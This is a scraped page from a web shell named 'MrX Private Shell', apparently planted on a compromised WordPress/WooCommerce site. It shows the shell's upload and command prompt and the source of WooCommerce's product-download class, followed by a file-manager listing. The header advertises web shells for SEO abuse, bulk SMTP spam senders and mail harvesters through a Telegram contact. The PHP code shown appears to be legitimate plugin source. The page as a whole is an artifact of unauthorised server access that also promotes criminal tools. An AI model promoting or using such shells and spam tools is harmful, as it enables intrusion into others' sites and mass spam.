__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Represents a file which can be downloaded.
 *
 * @package WooCommerce\Classes
 * @version 3.0.0
 * @since   3.0.0
 */

use Automattic\Jetpack\Constants;
use Automattic\WooCommerce\Internal\ProductDownloads\ApprovedDirectories\Register as Download_Directories;
use Automattic\WooCommerce\Internal\Utilities\URL;

defined( 'ABSPATH' ) || exit;

/**
 * Product download class.
 */
class WC_Product_Download implements ArrayAccess {

	/**
	 * Data array.
	 *
	 * @since 3.0.0
	 * @var array
	 */
	protected $data = array(
		'id'      => '',
		'name'    => '',
		'file'    => '',
		'enabled' => true,
	);

	/**
	 * Returns all data for this object.
	 *
	 * @return array
	 */
	public function get_data() {
		return $this->data;
	}

	/**
	 * Get allowed mime types.
	 *
	 * @return array
	 */
	public function get_allowed_mime_types() {
		return apply_filters( 'woocommerce_downloadable_file_allowed_mime_types', get_allowed_mime_types() );
	}

	/**
	 * Get type of file path set.
	 *
	 * @param  string $file_path optional.
	 * @return string absolute, relative, or shortcode.
	 */
	public function get_type_of_file_path( $file_path = '' ) {
		$file_path  = $file_path ? $file_path : $this->get_file();
		$parsed_url = wp_parse_url( $file_path );
		if (
			$parsed_url &&
			isset( $parsed_url['host'] ) && // Absolute url means that it has a host.
			( // Theoretically we could permit any scheme (like ftp as well), but that has not been the case before. So we allow none or http(s).
				! isset( $parsed_url['scheme'] ) ||
				in_array( $parsed_url['scheme'], array( 'http', 'https' ), true )
			)
		) {
			return 'absolute';
		} elseif ( '[' === substr( $file_path, 0, 1 ) && ']' === substr( $file_path, -1 ) ) {
			return 'shortcode';
		} else {
			return 'relative';
		}
	}

	/**
	 * Get file type.
	 *
	 * @return string
	 */
	public function get_file_type() {
		$type = wp_check_filetype( strtok( $this->get_file(), '?' ), $this->get_allowed_mime_types() );
		return $type['type'];
	}

	/**
	 * Get file extension.
	 *
	 * @return string
	 */
	public function get_file_extension() {
		$parsed_url = wp_parse_url( $this->get_file(), PHP_URL_PATH );
		return pathinfo( $parsed_url, PATHINFO_EXTENSION );
	}

	/**
	 * Confirms that the download is of an allowed filetype, that it exists and that it is
	 * contained within an approved directory. Used before adding to a product's list of
	 * downloads.
	 *
	 * @internal
	 * @throws Exception If the download is determined to be invalid.
	 *
	 * @param bool $auto_add_to_approved_directory_list If the download is not already in the approved directory list, automatically add it if possible.
	 */
	public function check_is_valid( bool $auto_add_to_approved_directory_list = true ) {
		$download_file = $this->get_file();

		if ( ! $this->data['enabled'] ) {
			throw new Exception(
				sprintf(
					/* translators: %s: Downloadable file. */
					__( 'The downloadable file %s cannot be used as it has been disabled.', 'woocommerce' ),
					'<code>' . basename( $download_file ) . '</code>'
				)
			);
		}

		if ( ! $this->is_allowed_filetype() ) {
			throw new Exception(
				sprintf(
					/* translators: 1: Downloadable file, 2: List of allowed filetypes. */
					__( 'The downloadable file %1$s cannot be used as it does not have an allowed file type. Allowed types include: %2$s', 'woocommerce' ),
					'<code>' . basename( $download_file ) . '</code>',
					'<code>' . implode( ', ', array_keys( $this->get_allowed_mime_types() ) ) . '</code>'
				)
			);
		}

		// Validate the file exists.
		if ( ! $this->file_exists() ) {
			$this->raise_invalid_file_exception( $download_file );
		}

		$this->approved_directory_checks( $auto_add_to_approved_directory_list );
	}

	/**
	 * Check if file is allowed.
	 *
	 * @return boolean
	 */
	public function is_allowed_filetype() {
		$file_path = $this->get_file();

		// File types for URL-based files located on the server should get validated.
		$parsed_file_path  = WC_Download_Handler::parse_file_path( $file_path );
		$is_file_on_server = ! $parsed_file_path['remote_file'];
		$file_path_type    = $this->get_type_of_file_path( $file_path );

		// Shortcodes are allowed, validations should be done by the shortcode provider in this case.
		if ( 'shortcode' === $file_path_type ) {
			return true;
		}

		// Remote paths are allowed.
		if ( ! $is_file_on_server && 'relative' !== $file_path_type ) {
			return true;
		}

		// On windows system, local files ending with `.` are not allowed.
		// @link https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?redirectedfrom=MSDN#naming-conventions.
		if ( $is_file_on_server && ! $this->get_file_extension() && 'WIN' === strtoupper( substr( Constants::get_constant( 'PHP_OS' ), 0, 3 ) ) ) {
			if ( '.' === substr( $file_path, -1 ) ) {
				return false;
			}
		}

		return ! $this->get_file_extension() || in_array( $this->get_file_type(), $this->get_allowed_mime_types(), true );
	}

	/**
	 * Validate file exists.
	 *
	 * @return boolean
	 */
	public function file_exists() {
		if ( 'relative' !== $this->get_type_of_file_path() ) {
			return true;
		}
		$file_url = $this->get_file();
		if ( '..' === substr( $file_url, 0, 2 ) || '/' !== substr( $file_url, 0, 1 ) ) {
			$file_url = realpath( ABSPATH . $file_url );
		} elseif ( substr( WP_CONTENT_DIR, strlen( untrailingslashit( ABSPATH ) ) ) === substr( $file_url, 0, strlen( substr( WP_CONTENT_DIR, strlen( untrailingslashit( ABSPATH ) ) ) ) ) ) {
			$file_url = realpath( WP_CONTENT_DIR . substr( $file_url, 11 ) );
		}
		return apply_filters( 'woocommerce_downloadable_file_exists', file_exists( $file_url ), $this->get_file() );
	}

	/**
	 * Confirms that the download exists within an approved directory.
	 *
	 * If it is not within an approved directory but the current user has sufficient
	 * capabilities, then the method will try to add the download's directory to the
	 * approved directory list.
	 *
	 * @throws Exception If the download is not in an approved directory.
	 *
	 * @param bool $auto_add_to_approved_directory_list If the download is not already in the approved directory list, automatically add it if possible.
	 */
	private function approved_directory_checks( bool $auto_add_to_approved_directory_list = true ) {
		$download_directories = wc_get_container()->get( Download_Directories::class );

		if ( $download_directories->get_mode() !== Download_Directories::MODE_ENABLED ) {
			return;
		}

		$download_file = $this->get_file();

		/**
		 * Controls whether shortcodes should be resolved and validated using the Approved Download Directory feature.
		 *
		 * @param bool $should_validate
		 */
		if ( apply_filters( 'woocommerce_product_downloads_approved_directory_validation_for_shortcodes', true ) && 'shortcode' === $this->get_type_of_file_path() ) {
			$download_file = do_shortcode( $download_file );
		}

		$is_site_administrator   = is_multisite() ? current_user_can( 'manage_sites' ) : current_user_can( 'manage_options' );
		$valid_storage_directory = $download_directories->is_valid_path( $download_file );

		if ( $valid_storage_directory ) {
			return;
		}

		if ( $auto_add_to_approved_directory_list ) {
			try {
				// Add the parent URL to the approved directories list, but *do not enable it* unless the current user is a site admin.
				$download_directories->add_approved_directory( ( new URL( $download_file ) )->get_parent_url(), $is_site_administrator );
				$valid_storage_directory = $download_directories->is_valid_path( $download_file );
			} catch ( Exception $e ) { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement.DetectedCatch
				// At this point, $valid_storage_directory will be false. Fall-through so the appropriate exception is
				// triggered (same as if the storage directory was invalid and $auto_add_to_approved_directory_list was false.
			}
		}

		if ( ! $valid_storage_directory ) {
			$this->raise_invalid_file_exception( $download_file );
		}
	}

	/**
	 * Convenience method, allows us to re-use the same exception messaging from different areas.
	 *
	 * @throws Exception
	 *
	 * @param string $download_file
	 *
	 * @return void
	 */
	private function raise_invalid_file_exception( string $download_file ): void {
		throw new Exception(
			sprintf(
				/* translators: %1$s is the downloadable file path, %2$s is an opening link tag, %3%s is a closing link tag. */
				__( 'The downloadable file %s cannot be used as it does not exist on the server, or is not located within an approved directory. Please contact a site administrator for help. %2$sLearn more.%3$s', 'woocommerce' ),
				'<code>' . $download_file . '</code>',
				'<a href="https://woocommerce.com/document/approved-download-directories">',
				'</a>'
			)
		);
	}

	/*
	|--------------------------------------------------------------------------
	| Setters
	|--------------------------------------------------------------------------
	*/

	/**
	 * Set ID.
	 *
	 * @param string $value Download ID.
	 */
	public function set_id( $value ) {
		$this->data['id'] = wc_clean( $value );
	}

	/**
	 * Set name.
	 *
	 * @param string $value Download name.
	 */
	public function set_name( $value ) {
		$this->data['name'] = wc_clean( $value );
	}

	/**
	 * Set previous_hash.
	 *
	 * @deprecated 3.3.0 No longer using filename based hashing to keep track of files.
	 * @param string $value Previous hash.
	 */
	public function set_previous_hash( $value ) {
		wc_deprecated_function( __FUNCTION__, '3.3' );
		$this->data['previous_hash'] = wc_clean( $value );
	}

	/**
	 * Set file.
	 *
	 * @param string $value File URL/Path.
	 */
	public function set_file( $value ) {
		// A `///` is recognized as an "absolute", but on the filesystem, so it bypasses the mime check in `self::is_allowed_filetype`.
		// This will strip extra prepending / to the maximum of 2.
		if ( preg_match( '#^//+(/[^/].+)$#i', $value, $matches ) ) {
			$value = $matches[1];
		}
		switch ( $this->get_type_of_file_path( $value ) ) {
			case 'absolute':
				$this->data['file'] = esc_url_raw( $value );
				break;
			default:
				$this->data['file'] = wc_clean( $value );
				break;
		}
	}

	/**
	 * Sets the status of the download to enabled (true) or disabled (false).
	 *
	 * @param bool $enabled True indicates the downloadable file is enabled, false indicates it is disabled.
	 */
	public function set_enabled( bool $enabled = true ) {
		$this->data['enabled'] = $enabled;
	}

	/*
	|--------------------------------------------------------------------------
	| Getters
	|--------------------------------------------------------------------------
	*/

	/**
	 * Get id.
	 *
	 * @return string
	 */
	public function get_id() {
		return $this->data['id'];
	}

	/**
	 * Get name.
	 *
	 * @return string
	 */
	public function get_name() {
		return $this->data['name'];
	}

	/**
	 * Get previous_hash.
	 *
	 * @deprecated 3.3.0 No longer using filename based hashing to keep track of files.
	 * @return string
	 */
	public function get_previous_hash() {
		wc_deprecated_function( __FUNCTION__, '3.3' );
		return $this->data['previous_hash'];
	}

	/**
	 * Get file.
	 *
	 * @return string
	 */
	public function get_file() {
		return $this->data['file'];
	}

	/**
	 * Get status of the download.
	 *
	 * @return bool
	 */
	public function get_enabled(): bool {
		return $this->data['enabled'];
	}

	/*
	|--------------------------------------------------------------------------
	| ArrayAccess/Backwards compatibility.
	|--------------------------------------------------------------------------
	*/

	/**
	 * OffsetGet.
	 *
	 * @param string $offset Offset.
	 * @return mixed
	 */
	#[\ReturnTypeWillChange]
	public function offsetGet( $offset ) {
		switch ( $offset ) {
			default:
				if ( is_callable( array( $this, "get_$offset" ) ) ) {
					return $this->{"get_$offset"}();
				}
				break;
		}
		return '';
	}

	/**
	 * OffsetSet.
	 *
	 * @param string $offset Offset.
	 * @param mixed  $value Offset value.
	 */
	#[\ReturnTypeWillChange]
	public function offsetSet( $offset, $value ) {
		switch ( $offset ) {
			default:
				if ( is_callable( array( $this, "set_$offset" ) ) ) {
					$this->{"set_$offset"}( $value );
				}
				break;
		}
	}

	/**
	 * OffsetUnset.
	 *
	 * @param string $offset Offset.
	 */
	#[\ReturnTypeWillChange]
	public function offsetUnset( $offset ) {}

	/**
	 * OffsetExists.
	 *
	 * @param string $offset Offset.
	 * @return bool
	 */
	#[\ReturnTypeWillChange]
	public function offsetExists( $offset ) {
		return in_array( $offset, array_keys( $this->data ), true );
	}
}

Filemanager

Name Type Size Permission Actions
abstracts Folder 0775
admin Folder 0775
blocks Folder 0775
cli Folder 0775
customizer Folder 0775
data-stores Folder 0775
emails Folder 0775
export Folder 0775
gateways Folder 0775
import Folder 0775
integrations Folder 0775
interfaces Folder 0775
legacy Folder 0775
libraries Folder 0775
log-handlers Folder 0775
payment-tokens Folder 0775
product-usage Folder 0775
queue Folder 0775
react-admin Folder 0775
rest-api Folder 0775
shipping Folder 0775
shortcodes Folder 0775
theme-support Folder 0775
tracks Folder 0775
traits Folder 0775
walkers Folder 0775
wccom-site Folder 0775
widgets Folder 0775
class-wc-ajax.php File 120.02 KB 0664
class-wc-auth.php File 12.69 KB 0664
class-wc-autoloader.php File 5.27 KB 0664
class-wc-background-emailer.php File 4.58 KB 0664
class-wc-background-updater.php File 3.45 KB 0664
class-wc-brands-brand-settings-manager.php File 1.78 KB 0664
class-wc-brands-coupons.php File 6.89 KB 0664
class-wc-brands.php File 35.13 KB 0664
class-wc-breadcrumb.php File 9.49 KB 0664
class-wc-cache-helper.php File 12.69 KB 0664
class-wc-cart-fees.php File 3.37 KB 0664
class-wc-cart-session.php File 23.34 KB 0664
class-wc-cart-totals.php File 28.48 KB 0664
class-wc-cart.php File 71.24 KB 0664
class-wc-checkout.php File 50.15 KB 0664
class-wc-cli.php File 3.34 KB 0664
class-wc-comments.php File 22.63 KB 0664
class-wc-countries.php File 50.01 KB 0664
class-wc-coupon.php File 40.95 KB 0664
class-wc-customer-download-log.php File 3.37 KB 0664
class-wc-customer-download.php File 10.34 KB 0664
class-wc-customer.php File 32.54 KB 0664
class-wc-data-exception.php File 1.29 KB 0664
class-wc-data-store.php File 6.59 KB 0664
class-wc-datetime.php File 2.26 KB 0664
class-wc-deprecated-action-hooks.php File 6.59 KB 0664
class-wc-deprecated-filter-hooks.php File 7.34 KB 0664
class-wc-discounts.php File 36.64 KB 0664
class-wc-download-handler.php File 28.37 KB 0664
class-wc-emails.php File 38.15 KB 0664
class-wc-embed.php File 4.24 KB 0664
class-wc-form-handler.php File 46.5 KB 0664
class-wc-frontend-scripts.php File 32.62 KB 0664
class-wc-geo-ip.php File 30.43 KB 0664
class-wc-geolite-integration.php File 1.99 KB 0664
class-wc-geolocation.php File 11.32 KB 0664
class-wc-https.php File 4.33 KB 0664
class-wc-install.php File 112.39 KB 0664
class-wc-integrations.php File 1.28 KB 0664
class-wc-log-levels.php File 3.9 KB 0664
class-wc-logger.php File 9.38 KB 0664
class-wc-meta-data.php File 2.21 KB 0664
class-wc-order-factory.php File 8.52 KB 0664
class-wc-order-item-coupon.php File 4.08 KB 0664
class-wc-order-item-fee.php File 9.21 KB 0664
class-wc-order-item-meta.php File 5.8 KB 0664
class-wc-order-item-product.php File 16.15 KB 0664
class-wc-order-item-shipping.php File 8.8 KB 0664
class-wc-order-item-tax.php File 6.49 KB 0664
class-wc-order-item.php File 19.93 KB 0664
class-wc-order-query.php File 2.55 KB 0664
class-wc-order-refund.php File 5.99 KB 0664
class-wc-order.php File 76.82 KB 0664
class-wc-payment-gateways.php File 15.58 KB 0664
class-wc-payment-tokens.php File 6.24 KB 0664
class-wc-post-data.php File 36.24 KB 0664
class-wc-post-types.php File 32 KB 0664
class-wc-privacy-background-process.php File 1.79 KB 0664
class-wc-privacy-erasers.php File 13.61 KB 0664
class-wc-privacy-exporters.php File 14.69 KB 0664
class-wc-privacy.php File 17.22 KB 0664
class-wc-product-attribute.php File 6.97 KB 0664
class-wc-product-download.php File 12.25 KB 0664
class-wc-product-external.php File 4.98 KB 0664
class-wc-product-factory.php File 3.88 KB 0664
class-wc-product-grouped.php File 6.53 KB 0664
class-wc-product-query.php File 2.28 KB 0664
class-wc-product-simple.php File 2.7 KB 0664
class-wc-product-variable.php File 22.41 KB 0664
class-wc-product-variation.php File 20.18 KB 0664
class-wc-query.php File 33.5 KB 0664
class-wc-rate-limiter.php File 4 KB 0664
class-wc-regenerate-images-request.php File 7.74 KB 0664
class-wc-regenerate-images.php File 15.44 KB 0664
class-wc-register-wp-admin-settings.php File 5.05 KB 0664
class-wc-rest-authentication.php File 21.55 KB 0664
class-wc-rest-exception.php File 276 B 0664
class-wc-session-handler.php File 24.15 KB 0664
class-wc-shipping-rate.php File 9.34 KB 0664
class-wc-shipping-zone.php File 13.08 KB 0664
class-wc-shipping-zones.php File 5 KB 0664
class-wc-shipping.php File 12.85 KB 0664
class-wc-shortcodes.php File 18.82 KB 0664
class-wc-structured-data.php File 23.76 KB 0664
class-wc-tax.php File 38.31 KB 0664
class-wc-template-loader.php File 20.42 KB 0664
class-wc-tracker.php File 51.5 KB 0664
class-wc-validation.php File 5.79 KB 0664
class-wc-webhook.php File 30.08 KB 0664
class-woocommerce.php File 60.3 KB 0664
wc-account-functions.php File 14.15 KB 0664
wc-attribute-functions.php File 21.85 KB 0664
wc-brands-functions.php File 4.17 KB 0664
wc-cart-functions.php File 21.05 KB 0664
wc-conditional-functions.php File 15.53 KB 0664
wc-core-functions.php File 86.83 KB 0664
wc-coupon-functions.php File 5.55 KB 0664
wc-deprecated-functions.php File 38.12 KB 0664
wc-formatting-functions.php File 49.9 KB 0664
wc-notice-functions.php File 8.08 KB 0664
wc-order-functions.php File 42.94 KB 0664
wc-order-item-functions.php File 5.03 KB 0664
wc-order-step-logger-functions.php File 5.92 KB 0664
wc-page-functions.php File 9.43 KB 0664
wc-product-functions.php File 57.71 KB 0664
wc-rest-functions.php File 13.93 KB 0664
wc-stock-functions.php File 17.43 KB 0664
wc-template-functions.php File 138.38 KB 0664
wc-template-hooks.php File 12.84 KB 0664
wc-term-functions.php File 24.57 KB 0664
wc-update-functions.php File 95.92 KB 0664
wc-user-functions.php File 34.17 KB 0664
wc-webhook-functions.php File 5.77 KB 0664
wc-widget-functions.php File 2.01 KB 0664
Filemanager